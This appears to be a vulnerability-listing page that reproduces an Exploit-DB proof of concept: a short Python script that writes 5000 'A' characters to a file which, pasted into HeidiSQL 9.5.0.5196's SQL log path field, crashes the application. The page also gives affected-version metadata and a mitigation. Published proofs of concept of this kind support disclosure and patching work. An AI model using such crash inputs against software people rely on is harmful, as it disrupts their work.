header-logo
Suggest Exploit
vendor:
HeidiSQL
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: HeidiSQL
Affected Version From: 9.5.0.5196
Affected Version To: 9.5.0.5196
Patch Exists: YES
Related CWE: N/A
CPE: a:heidisql:heidisql:9.5.0.5196
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1
2018

HeidiSQL 9.5.0.5196 – Denial of Service (PoC)

HeidiSQL 9.5.0.5196 is vulnerable to Denial of Service attack when a maliciously crafted bd.txt file is used. By copying the content of the bd.txt file to the clipboard and pasting it into the 'Write SQL log to file' field in the 'Preferences' > 'Logging' menu, the application will crash.

Mitigation:

Upgrade to the latest version of HeidiSQL 9.5.0.5196 or later.
Source

Exploit-DB raw data:

# Exploit Title: HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Discovery Date: 2018-11-06
# Vendor Homepage: https://www.heidisql.com/
# Software Link: https://www.heidisql.com/download.php
# Tested Version: 9.5.0.5196
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: HeidiSQL 9.5.0.5196.py
#2.- Open bd.txt and copy content to clipboard
#2.- Open HeidiSQL
#3.- Select "More"
#4.- Select "Preferences" > "Logging"
#5.- Select "Write SQL log to file" and Paste ClipBoard
#6.- Click on "OK"
#7.- Crashed

cod = "\x41" * 5000

f = open('bd.txt', 'w')
f.write(cod)
f.close()

Navigation

Suggest Exploit

Services By CQR